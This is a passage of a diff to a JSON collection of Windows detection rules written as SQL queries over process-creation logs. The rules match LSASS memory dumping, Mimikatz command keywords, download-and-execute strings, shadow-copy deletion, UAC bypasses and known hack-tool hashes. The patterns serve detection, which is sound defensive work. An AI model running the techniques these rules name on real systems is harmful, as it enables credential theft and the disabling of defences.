'%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1204" - ], - "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { "title": "UAC Bypass via Event Viewer", @@ -14147,9757 +13759,9596 @@ "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Administrative activity" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 